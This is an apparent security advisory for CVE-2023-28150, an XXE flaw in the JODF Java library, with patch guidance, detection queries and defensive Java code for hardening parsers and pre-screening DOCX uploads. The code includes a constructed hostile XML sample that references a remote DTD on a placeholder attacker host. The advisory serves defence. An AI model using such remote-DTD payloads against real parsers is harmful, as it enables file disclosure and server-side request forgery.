CVE-2023-28150

5.3 MEDIUM
XXE

📋 TL;DR

Independentsoft JODF before 1.1.110 processes XML External Entity (XXE) declarations in the XML parts of a DOCX file, so an attacker who can get an application to parse a crafted DOCX (most commonly through a file upload, but any path that feeds untrusted documents to the library) can reference a remote DTD and have the server resolve it. The result is server-side file disclosure, server-side request forgery, or both. The flaw is in the library itself, so every application that hands DOCX files to a vulnerable JODF is affected.

💻 Affected Systems

Products:
  • Independentsoft JODF
Versions: All versions before 1.1.110
Operating Systems: All platforms running Java
Default Config Vulnerable: ⚠️ Yes
Notes: Any application using JODF library to parse DOCX files is vulnerable. The vulnerability is in the library itself, not dependent on specific application configurations.

📦 What is this software?

⚠️ Risk & Real-World Impact

🔴

Worst Case

Disclosure of files readable by the application account (credentials, keys, configuration), which an attacker chains into further compromise, plus server-side request forgery against internal services reachable from the parsing host.

🟠

Likely Case

Unauthorized read of files on the server, disclosure of configuration files, and limited internal network probing through the parser's outbound requests.

🟢

If Mitigated

No impact when uploads are screened for DOCTYPE declarations before parsing, or when the parser in use cannot resolve external entities or DTDs.

🌐 Internet-Facing: HIGH - Web applications accepting DOCX uploads are directly exposed to exploitation attempts.
🏢 Internal Only: MEDIUM - Internal applications processing DOCX files could be exploited by authenticated users or through other attack vectors.

🎯 Exploit Status

Public PoC: ❌ No
Weaponized: LIKELY (generic XXE payloads for DOCX parts need no adaptation specific to JODF)
Unauthenticated Exploit: ⚠️ Depends on the application: yes wherever untrusted users can submit DOCX files without logging in
Complexity: LOW

XXE exploitation is well-documented and requires only a crafted DOCX file. No authentication needed if file upload functionality is exposed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 1.1.110

Vendor Advisory: https://www.independentsoft.de/jword/index.html

Restart Required: Yes; the JAR is replaced at build time, so the application must be rebuilt and redeployed (restarted) for the fix to take effect.

Instructions:

1. Update the JODF dependency to version 1.1.110 or later.
2. Replace the JODF JAR in your application's dependencies (Maven/Gradle coordinates or the vendored JAR).
3. Rebuild and redeploy the application.

🔧 Temporary Workarounds

Disable DOCTYPE and external entity processing (all platforms)

Configure the XML parser so that it refuses DOCTYPE declarations and never resolves external entities or external DTDs. In JAXP terms that means setting the feature XMLConstants.FEATURE_SECURE_PROCESSING to true and the feature "http://apache.org/xml/features/disallow-doctype-decl" to true; a DOCX part never legitimately carries a DOCTYPE, so rejecting it loses nothing. Caveat: JODF creates its own parser internally, so an application cannot pass these settings to it. The only lever that reaches the library's own parsing is JVM-wide: start the JVM with -Djavax.xml.accessExternalDTD= and -Djavax.xml.accessExternalSchema= (empty values), which tell the JDK's built-in JAXP parsers to refuse all external DTD and schema fetches unless a library explicitly overrides them. Whether that is effective against JODF's parser must be verified, not assumed.
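As an added illustration, not JODF code and not the library's API, the following shows what "disable external entity resolution" means for the JDK's built-in DOM parser. It assumes the caller controls the parser, which is true for XML the application parses itself (for example a manifest it reads from the same upload) but not for the parsing JODF does internally. The hostile sample document and the host attacker.invalid are constructed for the demonstration.

```java
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import javax.xml.XMLConstants;
import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;
import javax.xml.parsers.ParserConfigurationException;
import org.xml.sax.SAXParseException;

public final class HardenedXml {

    /** DOM parser that refuses DOCTYPE outright and, as defence in depth, never fetches DTDs or entities. */
    public static DocumentBuilder newDocumentBuilder() throws ParserConfigurationException {
        DocumentBuilderFactory f = DocumentBuilderFactory.newInstance();
        // Secure processing alone does NOT stop external entity resolution; it mainly caps entity expansion.
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        // The one setting that closes XXE by itself: no DOCTYPE, hence no ENTITY and no external DTD.
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces for parsers that must tolerate a DOCTYPE (not the DOCX case).
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, "");    // JAXP 1.5: no protocol is allowed
        f.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, "");
        f.setXIncludeAware(false);
        f.setExpandEntityReferences(false);
        return f.newDocumentBuilder();
    }

    public static void main(String[] args) throws Exception {
        // Constructed sample in the shape of a DOCX part carrying a remote DTD reference.
        // attacker.invalid is a placeholder host; it is never contacted because the DOCTYPE is rejected first.
        String hostile = "<?xml version=\"1.0\"?>\n"
            + "<!DOCTYPE w:document SYSTEM \"http://attacker.invalid/r.dtd\">\n"
            + "<w:document xmlns:w=\"http://schemas.openxmlformats.org/wordprocessingml/2006/main\"/>";
        try {
            newDocumentBuilder().parse(new ByteArrayInputStream(hostile.getBytes(StandardCharsets.UTF_8)));
            System.out.println("parsed: parser is NOT hardened");
        } catch (SAXParseException e) {
            System.out.println("rejected: " + e.getMessage());
        }
    }
}
```

Run against the hostile sample the parser throws a SAXParseException at the DOCTYPE line. To check whether the JVM-wide properties reach JODF's own parser, start the application with -Djavax.xml.accessExternalDTD= and feed it a DOCX whose document.xml references a DTD on a host you monitor: a request arriving at that host means the library is not using (or is overriding) the JDK defaults, and the workaround does not apply.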

File content validation before parsing (all platforms)

A DOCX is a ZIP archive of XML parts, so checking the extension or MIME type says nothing about the payload. Unpack the archive in a bounded way and reject the file if any XML part (word/document.xml, [Content_Types].xml, the .rels parts, and so on) contains a DOCTYPE declaration; legitimate OOXML parts never carry one. Do this before the file reaches JODF.
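An added example of that pre-screen, written for this page and not taken from JODF or any application using it. It treats the upload as the ZIP archive it is, scans only the parts an OOXML reader would hand to an XML parser, caps the inflated size of each part, and reports any part carrying a DOCTYPE. The sample archive and the host attacker.invalid are constructed inline.

```java
import java.io.ByteArrayInputStream;
import java.io.ByteArrayOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.nio.charset.StandardCharsets;
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Pattern;
import java.util.zip.ZipEntry;
import java.util.zip.ZipInputStream;
import java.util.zip.ZipOutputStream;

public final class DocxPrescreen {

    // No OOXML part legitimately carries a DOCTYPE, so any declaration (and with it any
    // ENTITY or remote DTD reference) is grounds to reject the file before JODF sees it.
    private static final Pattern DOCTYPE = Pattern.compile("<!DOCTYPE", Pattern.CASE_INSENSITIVE);

    // Cap on the inflated size of a single part; also blunts decompression-bomb uploads.
    private static final long MAX_PART_BYTES = 50L * 1024 * 1024;

    /** Returns the names of XML parts that contain a DOCTYPE declaration (empty list = clean). */
    public static List<String> findDoctypeParts(InputStream docx) throws IOException {
        List<String> hits = new ArrayList<>();
        try (ZipInputStream zip = new ZipInputStream(docx)) {
            ZipEntry entry;
            while ((entry = zip.getNextEntry()) != null) {
                String name = entry.getName();
                // Only the parts an OOXML reader feeds to an XML parser: *.xml and *.rels.
                if (entry.isDirectory() || !(name.endsWith(".xml") || name.endsWith(".rels"))) {
                    continue;
                }
                String text = decode(readCapped(zip, MAX_PART_BYTES));
                if (DOCTYPE.matcher(text).find()) {
                    hits.add(name);
                }
            }
        }
        return hits;
    }

    // Decode as UTF-16 when a BOM says so, else UTF-8; a UTF-16 part would otherwise slip
    // past a byte-oriented search for "<!DOCTYPE".
    private static String decode(byte[] b) {
        boolean utf16Bom = b.length >= 2
            && ((b[0] == (byte) 0xFE && b[1] == (byte) 0xFF) || (b[0] == (byte) 0xFF && b[1] == (byte) 0xFE));
        return new String(b, utf16Bom ? StandardCharsets.UTF_16 : StandardCharsets.UTF_8);
    }

    private static byte[] readCapped(InputStream in, long cap) throws IOException {
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        byte[] buf = new byte[8192];
        long total = 0;
        int n;
        while ((n = in.read(buf)) != -1) {
            total += n;
            if (total > cap) {
                throw new IOException("XML part larger than " + cap + " bytes");
            }
            out.write(buf, 0, n);
        }
        return out.toByteArray();
    }

    // Constructed sample: a two-part archive in DOCX layout with the given document.xml body.
    static byte[] sampleDocx(String documentXml) throws IOException {
        ByteArrayOutputStream bytes = new ByteArrayOutputStream();
        try (ZipOutputStream zip = new ZipOutputStream(bytes)) {
            zip.putNextEntry(new ZipEntry("[Content_Types].xml"));
            zip.write("<?xml version=\"1.0\"?><Types xmlns=\"http://schemas.openxmlformats.org/package/2006/content-types\"/>"
                .getBytes(StandardCharsets.UTF_8));
            zip.closeEntry();
            zip.putNextEntry(new ZipEntry("word/document.xml"));
            zip.write(documentXml.getBytes(StandardCharsets.UTF_8));
            zip.closeEntry();
        }
        return bytes.toByteArray();
    }

    public static void main(String[] args) throws IOException {
        String benign = "<?xml version=\"1.0\"?>"
            + "<w:document xmlns:w=\"http://schemas.openxmlformats.org/wordprocessingml/2006/main\"/>";
        // Constructed hostile part with a remote DTD reference; attacker.invalid is a placeholder host.
        String hostile = "<?xml version=\"1.0\"?>"
            + "<!DOCTYPE w:document SYSTEM \"http://attacker.invalid/r.dtd\"><w:document/>";
        System.out.println("benign parts flagged:  " + findDoctypeParts(new ByteArrayInputStream(sampleDocx(benign))));
        System.out.println("hostile parts flagged: " + findDoctypeParts(new ByteArrayInputStream(sampleDocx(hostile))));
    }
}
```

The benign archive yields an empty list and the hostile one reports word/document.xml. Wire findDoctypeParts into the upload handler and refuse the request when the list is non-empty; keep the parse itself out of the request thread and in a worker with no outbound network access so that anything the screen misses still cannot reach an attacker's DTD host.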

🧯 If You Can't Patch

  • Block outbound HTTP/HTTPS/FTP from the hosts that parse documents, except to an explicit allow-list. Remote-DTD XXE depends on the server fetching the attacker's DTD, and the usual exfiltration path depends on a second outbound request carrying the stolen data; egress filtering cuts both.
  • Run the document parser in an isolated worker with an unprivileged account and a minimal, read-only filesystem, so that a successful entity read exposes as little as possible.
  • A WAF rule looking for DOCTYPE or ENTITY in the request body is a weak control here: the payload is compressed inside the ZIP and is invisible unless the WAF inflates archives. Use it only as a secondary layer behind the pre-screen above.

🔍 How to Verify

Check if Vulnerable:

Find the JODF version resolved into the application. Any version below 1.1.110 is vulnerable regardless of how the application is configured.

Check Version:

Check the resolved dependency in pom.xml or build.gradle (mvn dependency:tree or gradle dependencies shows the version actually packaged), or inspect the deployed JAR directly: unzip -p jodf.jar META-INF/MANIFEST.MF, where the JAR file name usually carries the version as well. Check the deployed artifact, not just the build file, since a stale JAR can survive in a deployment directory.

Verify Fix Applied:

Confirm that the deployed application carries JODF 1.1.110 or later, then test the behaviour: submit a DOCX whose document.xml declares a DOCTYPE with a SYSTEM reference to a DTD on a host you monitor. No request arriving at that host during processing means the fix (or the mitigation) is effective.

📡 Detection & Monitoring

Log Indicators:

  • Unusual file upload patterns
  • XML parser errors mentioning DOCTYPE, ENTITY, a DTD, or a failed fetch of an external resource while a DOCX is being processed
  • Outbound connections to unusual domains during file processing

Network Indicators:

  • HTTP requests to external DTD URLs from server during DOCX processing
  • Unusual outbound traffic patterns following file uploads

SIEM Query:

Application logs (the literal string "XXE" rarely appears in logs; search for what the parser actually reports):
source="application_logs" ("DOCTYPE" OR "ENTITY" OR "DTD") ("docx" OR ".docx")

Proxy or egress logs (field names depend on your log schema): requests for a *.dtd URL from a document-processing host to any destination outside your allow-list, especially within seconds of an upload event.
